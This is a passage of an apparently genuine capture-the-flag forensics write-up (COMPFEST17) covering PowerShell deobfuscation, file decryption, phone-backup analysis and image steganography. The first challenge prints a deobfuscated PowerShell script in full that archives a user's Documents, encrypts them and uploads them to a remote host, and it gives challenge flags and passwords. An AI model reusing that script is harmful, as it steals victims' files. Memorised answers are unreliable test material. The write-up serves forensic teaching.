'#9 49 7)7#^49 [4:7)#4)#]'?#74 \	)=\47#79  	):)#]$)7 #X9#44<?' 	9 97"4977#Y79	4)7T7)#=79&]$49#9"F$)Y$9#4)#849#4 	)#<94Z 94#9<; 8	9#U7	<97F$9"+	4Y4) ]	9 75#774799]) &	9"94 ?97'X)#	9"49#[ 77 \4 897)'9479#4)#	 9")	 #;)';)78# 	):49 49779;_49 
7)77)<]4)#'4 8X$)"$9#	7?74) 9"9"	7)#7?)#')77)#7=_4 	#*78	)#'4 94X$9 7)74]4)#F$)"'"9#7)#(	)'X ?)#[	9=\4#Y?97Z$&7)#Y4#4)#494	9"]$4:#9"'8 7 9#7	 79 Z	) :	)	]$)"!' !	#\4)#	9"	"<)# 9#4?^<97_$)7799]4#7 _494X	)#'	#9" ')"B$)5\4)#F	9 :7)=\4 	 <#94#)74;?9#Z4)#7	X4# 	77)=) T89#[449"T4#9&9#4 ^;9: 7)#) 	)?X '	 <9 ^<97>? ;9:'9"*	)"?799 U4 #^47 7)#(	79" 	9<97$9"U	9;]9"7 ?\ $79#>7897$)77\4)# Y	X #;4U8)9#)74)#Y7)_4 U	#.79"	)#X'4,#)'_ 9 ;#) 	'4;4]89#7)4]9"F 87)<$)#U ,7"\494\4 7)? ?)7 '#/	9\497?)7$#984)77)#;7	]$4U # 95 ) 5')7";;9#7)#\	9>X ^7) 7';] $79#Y7)7 U47<)'#	9#74?)7##7489#77 4)>) +	)#$)	9"X'9477)#*79 77]4 
	974$_4)#*') '#Y4)#^9 /79#8)7')#"	99#4)#8"Y$#79"=7&#9#]49#	)879" 7)#	!77Z4 ??X4$7)#5	9!79#$7479 X4 7;) $#77Z49"B4] 49 <9$7;7 T9&9#)?)7T$94$)#	 >	&\4)#"	 &	9"4#<?) ')479#4#U9'\44??97X74 79"97 )>9#!7 ;	=)7]777$<)7^$) ':74.7)#	794)#%7 ;	$7#\4)#T'9<$)"7)#	?4) :;97Z78 79">7)#$	497[49"474] (	9#;79]<)7') ':\4#8	9":7?Y4 7 ^?<)7$ U		9# 4 [	)7
777)#<4])79 $) 	)77	]97'94='7$) X$9#:7)>79"U74 7&]7=79779&') <'9#[4:79 797?9'7;)#'')9$)#=7977=4)7%') [$)	$94[')#	9"47 )&4 97)7#4 Z)#=	' $) '9<\4479"_49!7)#	77997)7,') '#\4)779 7"?97$7T89!]$) $)#7=79 Y7)7&')5$ '	9#779"Z79 78]97U47^4)"< _	9".?8) 	;97"'9 ;)#') ^')<]749779'4	)#:	)49#^7944);477?)7Y'9\4 	9#7)	Y4#84'\4479"495_<)7Y') '>\4 	 [	$\ :79#)7 8)78') $)5$ )#'	779#B4)74)=\ 474]<4;9#?5?9"^<#? ?  ;) 89!89#>? 895\894X##		79#,7)#Z$99$) $)7,7\4)#U9"#?9;]44 49"479 Y4 /?)7X']9#<7#^<94	9"Z 	;]4:# 	'9'49749#"79!')"(74&7)>7#7 	98]49 79 7)7]$45;) B89?9# ?)#(;9	##X	974)?\4)#' $9'#94	)74_  7)#'?# ') 5	9=X494,	97$):Y44.794]7$_4 ]	)#7	49 Y7)#'8;) 8)7?"\<)#;94#_9779#F47]$ Z$)7Z =74[7)#4?4)#%7 	!7#4)#[$97#9"#')7"	";9"[$)"F4$]#,7977)\44#?97$) <9 ?9"F7)X49"<?9"4?) X< "? <9< 
? Z<)!<9 ?9 5?)<9 U?9 ?9><9 <9 <:<9 9?9 [<8<9  ?)#'9$$)7=79#):79"!7)"	994)7<)7'9'$)7:77<7:]497)79 4:8)7:')#^	):\4#<)"'5; ?9 )?9X49"879"<?8X<9"&? ?9?< +? $?4<9 4?9 ?9'<9 Z<9 T?!<9 <9 <) <9 Z<9 <)	<9 ?9 ?9;]$4_	)"^4549 *79#5?)577#?)9	9"&'9#	#9& 97	'97')? )"')"7') 79"_77477)7.')7#9Y44794U49=_4 	)#T4449 *7)#$$##$9799	4)7,;#;)7 )7_$)='7 ;9"'Y$#X'9787\$)#$ $')><9 $94X)"#Z!_9#	)#
	  	9 	 74977<74 74:779"4)"Y795^4#79#F4<]4 57 49'494 ;9";?Y8#4;#?;;\8)#Y8 F8=89 $;) 8)= ?97^<)7??49?94<9'X<)")?#$?)_<9#?)#[?8< $?9 4?9	X )"##Y#	_ 9#?#)#^    9 #9# #$)7"#$<9 ?9"F498X49"<9"8?	X< *? <>< ?? <><9 ?9 	?)4<9 %?9 <)<9 ?9  ?&<9 .?9 ^<9:<9 T?)#^''T %'JJE
>Y[/ +WW0.C >6E
>*CU+98WW0
	(C9C >6JVI6@\CC@EIC!
D0M@MJJMM';$xd=[System.Convert]::FromBase64String($c);$rd='';foreach($b in $xd){$rd+=[char]($b -bxor $x)};iex $rdThe above code can be simplified to:
$x=109;$c='...';$xd=[System.Convert]::FromBase64String($c);$rd='';foreach($b in $xd){$rd+=[char]($b -bxor $x)};iex $rdBy changing the iex at the end to Write-Host, we can make the script output the decrypted result:
$x=109;$c='...';$xd=[System.Convert]::FromBase64String($c);$rd='';foreach($b in $xd){$rd+=[char]($b -bxor $x)};Write-Host $rdRunning it gives:
$r ='...' | iexBy removing the | iex part layer by layer and re-running the script, we eventually deobfuscate it to the final layer:
$AAAAAAAAAAAAAABBBBBIIIiiAB='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!@#$%^&()_+-=[]{}~';$aadsfjkh=-join((1..15)|ForEach{$AAAAAAAAAAAAAABBBBBIIIiiAB[(Get-Random -Maximum $AAAAAAAAAAAAAABBBBBIIIiiAB.Length)]});$fnsdadkj="$env:TEMP\$aadsfjkh.zip";$cvmz="$env:TEMP\$aadsfjkh.enc";try{Get-ChildItem "$env:USERPROFILE\Documents" -Recurse -File|Where-Object{-not $_.PSIsContainer -and $_.Name -notlike "*transcript*" -and $_.Name -notlike "*.tmp"}|Compress-Archive -DestinationPath $fnsdadkj -CompressionLevel Fastest -ErrorAction SilentlyContinue;if(Test-Path $fnsdadkj){$pqoero=New-Object byte[] 16;$dma=New-Object byte[] 16;$zfsfdm=[System.Security.Cryptography.RNGCryptoServiceProvider]::Create();$zfsfdm.GetBytes($pqoero);$zfsfdm.GetBytes($dma);$zfsfdm.Dispose();$dmafnaas=[System.Security.Cryptography.Aes]::Create();$dmafnaas.Key=$pqoero;$dmafnaas.IV=$dma;$encryptor=$dmafnaas.CreateEncryptor();$dfnalkns=[System.IO.File]::ReadAllBytes($fnsdadkj);$agbaghb=$encryptor.TransformFinalBlock($dfnalkns,0,$dfnalkns.Length);$dmafnaas.Dispose();$combinedBytes=$pqoero+$agbaghb+$dma;[System.IO.File]::WriteAllBytes($cvmz,$combinedBytes);Remove-Item $fnsdadkj -Force -ErrorAction SilentlyContinue;iwr -Uri "http://192.168.18.76:8080/upload" -Method Post -InFile $cvmz -ContentType "application/octet-stream" -Headers @{"X-Filename"=(Split-Path $cvmz -Leaf)} -ErrorAction SilentlyContinue|Out-Null;if(Test-Path $cvmz){Remove-Item $cvmz -Force -ErrorAction SilentlyContinue}}}catch{}The file transferred to /upload can be extracted from the traffic capture. This is the ciphertext.
We can write a Python script to recover this file:
- Read the
.encfile. - Split the file into three parts: the first 16 bytes are the Key, the last 16 bytes are the Initialization Vector (IV), and the middle part is the encrypted data.
- Use the extracted Key and IV to perform AES decryption on the encrypted data.
- Remove the padding from the end of the decrypted data.
- Save the final plaintext data as a
.zipfile.
from Crypto.Cipher import AESfrom Crypto.Util.Padding import unpadimport sys # --- Configuration ---encrypted_file_path = "upload"decrypted_zip_path = "decrypted.zip"# --------------------- def decrypt_file(): """Reads the .enc file, extracts Key/IV, decrypts, and saves the original .zip file.""" print(f"[*] Reading the encrypted file: '{encrypted_file_path}'") with open(encrypted_file_path, "rb") as f: full_data = f.read() # Step 1: Extract the Key, IV, and Ciphertext from the file structure key = full_data[:16] iv = full_data[-16:] ciphertext = full_data[16:-16] print("[+] File components extracted successfully.") print(f" -> AES Key (HEX): {key.hex()}") print(f" -> AES IV (HEX): {iv.hex()}") try: # Step 2: Create an AES cipher object in CBC mode cipher = AES.new(key, AES.MODE_CBC, iv) # Step 3: Decrypt the ciphertext and unpad it (PKCS7 padding is default) decrypted_padded_data = cipher.decrypt(ciphertext) original_data = unpad(decrypted_padded_data, AES.block_size) except Exception as e: print(f"\n[!] An unexpected error occurred during decryption: {e}") sys.exit(1) # Step 4: Save the decrypted bytes to a .zip file with open(decrypted_zip_path, "wb") as f: f.write(original_data) if __name__ == "__main__": decrypt_file()After decompressing the zip file, the flag is found inside a PDF file.
FLAG
COMPFEST17{powershell_script_logging_is_very_powerfull_b4ffdc5da5}crash out
Challenge
Evan installed and executed a supposedly safe file. It caused his laptop to hang, several data to become corrupted, and new password-protected files to show up. The password popped up for a while, but I didn’t memorize it. Can you get me back my file?
Solution
First, I mounted the image using FTK as the F drive.
I started by finding a genuinely encrypted zip file at F:\Users\Evan\Documents\89a0b289f0221.zip, but I couldn’t figure out the password.
Then, I located the file F:\Users\Evan\Downloads\upload_queue\file.enc. The strange thing about this file was that its header was that of a JPG, but it couldn’t be opened correctly after changing the extension to .jpg. This led me to suspect it was encrypted.
Next, I found a suspicious file: F:\ProgramData\Dumps\chrome_updater.exe.34368.dmp. Attempting to open it with WinDbg resulted in an error, so I resorted to analyzing the strings within it.
Searching for 89a0b289f0221.zip or file.enc inside the dump led me to this line:

C:\\Users\\Evan\\Documents\\89a0b289f0221.zip whereourcrashis --flag= --crash= null div raise --wait= --path= C:\\Users\\Evan\\Downloads\\upload_queue\\file.enc chrome_updater.exe- chrome_updater.exe: This is the executed program. Based on its name, it’s likely an updater for a Chromium-based application, which fits the challenge description of a “supposedly safe file”.
- —crash= null div raise: This parameter explicitly instructs the program to perform an operation that will cause a crash.
- null: Likely represents a “null pointer dereference”.
- div: Likely represents a “division-by-zero error”.
- raise: Likely represents “throwing an exception”.
- whereourcrashis: This string is very colloquial, like a comment left by a developer. This ties into the theme of the challenge, not only confirming that this file is essential to the solution but also suggesting that the string itself will be very useful later.
I then tried to find chrome_updater.exe for reverse engineering but couldn’t locate it. However, during the search, I found a related Windows Error Reporting (WER) file: F:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_chrome_updater.e_7b71673944fedcfebbd880da83474929a7d18741_38b31a53_7dfb28da-126b-49f8-a06-216c4072ac0a\Report.wer. It contained the following content:
EventType=APPCRASH...Sig[6].Name=Exception CodeSig[6].Value=c0000005...- EventType=APPCRASH: The event type is an application crash.
- Sig[6].Name=Exception Code; Sig[6].Value=c0000005:
c0000005is the Windows exception code for an access violation. The most common cause of this exception is a null pointer dereference—that is, the program attempted to read from or write to a NULL memory address.
This matched my earlier speculation, confirming that chrome_updater.exe, 89a0b289f0221.zip, and file.enc are highly relevant files for this challenge. The meaningful string whereourcrashis from the command line is also very likely related.
Connecting the dots—I couldn’t find the password for 89a0b289f0221.zip, and the string whereourcrashis appeared right next to the zip file in the command—it was reasonable to infer that whereourcrashis was the password for 89a0b289f0221.zip. Trying it confirmed this suspicion.
After decompressing 89a0b289f0221.zip, I obtained a script for file encryption named script.py, with the following content:
import sysimport hashlibimport getpass HEADER_SIZE = 16def derive_key(password: str, length: int = 32) -> bytes: return hashlib.sha256(password.encode()).digest()[:length] def transform(byte, key_byte, i): xored = byte ^ key_byte rotation = i % 3 return ((xored << rotation) | (xored >> (8 - rotation))) & 0xFF def encrypt(input_file, output_file, password): key = derive_key(password) with open(input_file, 'rb') as f: data = f.read() encrypted = bytearray(data[:HEADER_SIZE]) for i, byte in enumerate(data[HEADER_SIZE:], start=HEADER_SIZE): key_byte = key[i % len(key)] ^ (i & 0x0F) encrypted.append(transform(byte, key_byte, i)) with open(output_file, 'wb') as f: f.write(encrypted) print(f"Encrypted {input_file} -> {output_file}") if __name__ == "__main__": if len(sys.argv) != 4: print("Usage:") print("python3 script.py encrypt input.jpg output.enc") sys.exit(1) mode, input_file, output_file = sys.argv[1:4] password = getpass.getpass("Enter password: ") if mode == "encrypt": encrypt(input_file, output_file, password) else: print("Invalid")I noticed the usage example was python3 script.py encrypt input.jpg output.enc. Considering the file.enc I had found, it was highly probable that it was encrypted by this very script. Therefore, I wrote a corresponding decryption script:
import sysimport hashlibimport getpass HEADER_SIZE = 16 def derive_key(password: str, length: int = 32) -> bytes: """与加密脚本完全相同的密钥派生函数。""" return hashlib.sha256(password.encode()).digest()[:length] def untransform(byte, key_byte, i): """ 这是 transform 函数的逆函数。 1. 计算旋转位数。 2. 执行循环右移(ROR),这是循环左移(ROL)的逆操作。 3. 执行异或(XOR),这是其自身的逆操作。 """ rotation = i % 3 # 循环右移 (ROR) rotated_byte = ((byte >> rotation) | (byte << (8 - rotation))) & 0xFF # 异或 (XOR) original_byte = rotated_byte ^ key_byte return original_byte def decrypt(input_file, output_file, password): key = derive_key(password) with open(input_file, 'rb') as f: data = f.read() # 解密文件的前16字节头部是原文,直接复制 decrypted = bytearray(data[:HEADER_SIZE]) # 从第17个字节(索引16)开始循环解密 for i, byte in enumerate(data[HEADER_SIZE:], start=HEADER_SIZE): # 1. 生成与加密时完全相同的 key_byte key_byte = key[i % len(key)] ^ (i & 0x0F) # 2. 调用逆向转换函数 decrypted_byte = untransform(byte, key_byte, i) decrypted.append(decrypted_byte) with open(output_file, 'wb') as f: f.write(decrypted) print(f"Decrypted {input_file} -> {output_file}") if __name__ == "__main__": if len(sys.argv) != 4: print("Usage:") print("python3 script.py decrypt input.enc output.jpg") sys.exit(1) mode, input_file, output_file = sys.argv[1:4] password = getpass.getpass("Enter password: ") if mode == "decrypt": decrypt(input_file, output_file, password) else: print("Invalid mode. Use 'decrypt'.")Both encryption and decryption require a password. So far, the only password-like string I had encountered was whereourcrashis. I used it to decrypt file.enc, and as expected, it successfully decrypted into a JPG image.
There was only the image with no other information, so I suspected steganography. While checking the image’s EXIF information, I found a clue:
Exif Image Width : 1080Exif Image Height : 1080The EXIF information indicated the image dimensions were 1080x1080, but the actual size of the image was 1080x1024. This was clearly a case of JPG height/width steganography. After correcting the height, the flag was revealed at the bottom of the image.
FLAG
COMPFEST17{cr4sh1ng_1nt0_th3_v0001d_b00m_boOm_B00M!!_b51a77934b}Mr & Mrs Smith
Challenge
A couple in our office has been rather suspicious these past few weeks, though I cant do much as the guy’s father hold an authorative position. A few days ago he asked me to help back up his phone, and I managed to keep several information just in case I find something to prove my suspicions. Hmm, what does he usually do with his phone?
Chall: https://drive.google.com/drive/folders/1mM3LckA_NZ5O-NskteQOE_8V-R7_g-Dk?usp=sharing
Zip password : 2a07b93ef0362ba7286d536ac1e16c17
Solution
In the SQLite Files section, by sorting by modification date in descending order, we can see that only two files were modified in 2025: bugle_db.db on 2025-08-20, and calendar.db on 2025-08-12.

The bugle_db.db file stores the phone’s SMS messages. Let’s examine it for any useful information.

In the message_text table, the following conversation was found:
Hey, did you finish documenting the warehouse issues?Yes, I have all the photos and safety violation reports readyPerfect. The board meeting is next week, we need to be readyI know. Dad's going to be furious but people could get seriously hurtThe chemical storage violations alone could kill someoneI uploaded everything to our secure driveWhich one? We have multiple backup locationsWe upload our work here: https://drive.google.com/drive/folders/1wfF_RRAp_dyzDzHeNJhe4CvZNs9qbwUK?usp=sharingGreat! What's the access code again?It's encrypted with the date of our first date-location, like 23122025-londonbridgeGot it! The evidence package is solid. All papers, financial docs, everything. I'm pretty shocked to hear that you remember our anniversary.Yeah, I always keep a reminder of important dates and events on my phone. Anyways, I know this is hard with your family situation, but we're doing the right thingAgreed. I'll submit to the regulatory board next weekThanks for having my back on this. The safety violations are too serious to ignoreAlways. We have to protect the workers, even if it costs us our jobsThe photos from the scanner app should be the final piece we needPerfect. See you at our usual spot later to go over the timeline?Yes. Same time as our anniversary dinner reservation 😉How was work today sweetie?Busy as usual. Lots of documentation workDon't work too hard! Remember family dinner SundayWouldn't miss it mom ❤️Thanks for dinner last night! Love you ❤️Poker night this Friday?Can't this week, working on a big projectEverything OK? You've been busy latelyJust some important stuff at work. Rain check?Game night tomorrow at 8?Safety inspection results are inWhen can we discuss them?Let's schedule something privateAgreed. Too many ears in the officeMeeting moved to 2 PMWant to grab lunch today?Can't today, buried in paperworkYou've been stressed lately. Everything OK?Just work stuff. Nothing I can't handleCoffee later?The quarterly reports are due next weekI'm working on the safety compliance sectionMake sure everything is thoroughly documentedProject update needed ASAPHey go and watch this https://youtu.be/eVpKuSGM_-E?si=SJn01Vi5Aw-bQJPmWhat's thatSomething importantPackage delivery attemptedI wasn't expecting anythingYour package has been deliveredJohn, we need to discuss the safety audit resultsOf course. When would be convenient?Tomorrow morning, 8 AM sharp. Don't be lateI'll be there sirAnd John... keep this between us for nowA Google Drive link is mentioned in the conversation: https://drive.google.com/drive/folders/1wfF_RRAp_dyzDzHeNJhe4CvZNs9qbwUK?usp=sharing

Inside this Google Drive folder, an encrypted file named classified.pdf.gpg was found.
From the conversation, we can also gather the following information:
The couple is not having an affair; they are actually whistleblowers. They are secretly collecting evidence of serious safety violations in the company’s warehouse and plan to submit it to the regulatory board next week to protect the workers. The man’s father is a high-ranking executive in the company, which adds significant pressure and risk to their investigation, explaining their need for secrecy.
"Great! What's the access code again?" "It's encrypted with the date of our first date-location, like 23122025-londonbridge" This exchange reveals the password format for the file in Google Drive: DDMMYYYY-locationname. The location format is all lowercase with no spaces (e.g., londonbridge). The next step is to find the date and location of their first date.
"I'm pretty shocked to hear that you remember our anniversary." "Yeah, I always keep a reminder of important dates and events on my phone. These two lines imply that the date of their first date is recorded on the phone. Following this lead, we’ll now examine calendar.db.
In record #16 of the Event table, we find an “Anniversary” event with the description We started dating, and took a picture to commemorate it. The dtstart timestamp is 1583193600000, and the eventTimezone is America/New_York. Converting this timestamp gives us the date March 3, 2020. This provides the first part of the password: 03032020.

Following the clue from the record, “took a picture to commemorate it,” we now look for the photo. By filtering the images for a modification date between March 2, 2020, and March 4, 2020, we find a single image:

Below is its EXIF information:
...Software : Our first dateModify Date : 2020:03:03 14:30:00Date/Time Original : 2020:03:03 14:30:00Create Date : 2020:03:03 14:30:00...GPS Latitude : 40 deg 47' 6.32" NGPS Longitude : 73 deg 58' 5.82" WGPS Position : 40 deg 47' 6.32" N, 73 deg 58' 5.82" WNext, searching for 40°47'06.3"N 73°58'05.8"W on Google Maps reveals that the photo was taken in Central Park:

Therefore, the second part of the password is centralpark. Combining both parts, the full password is 03032020-centralpark.
Next, we use the password 03032020-centralpark to decrypt the classified.pdf.gpg file:
┌──(kali㉿kali)-[~/Desktop]└─$ gpg --decrypt classified.pdf.gpg > classified.pdfThe flag is found in the decrypted classified.pdf file.

FLAG
COMPFEST17{p4rtners_wh0_w0rk_t0gether_t00_w3ll_5b3c71c672} Update Required
Challenge
A researcher in Mondstadt’s tech division received an urgent-looking HTML file, claiming to be a critical security patch. Trusting its source, they executed antivirus.exe and moments later, a secret PDF file disappeared.
The PDF contained a confidential override PIN tied to the Vision Distribution Network. To protect it, the researcher locked the PDF with their wallet’s seed phrase (exported from a Chrome extension), joined with an underscore (_) as the password.
Although the wallet vault file remains on disk, the password to unlock it has since been lost. Fortunately, there’s a lead: the researcher once copied the vault password to clipboard.
Chall: https://drive.google.com/drive/folders/1R1psX7e04W1aJXFHK_WbNkRt5ukFXOlc?usp=sharing
Zip password : soalinigasusahkokxixixixi
Solution
TBD
FLAG
TBD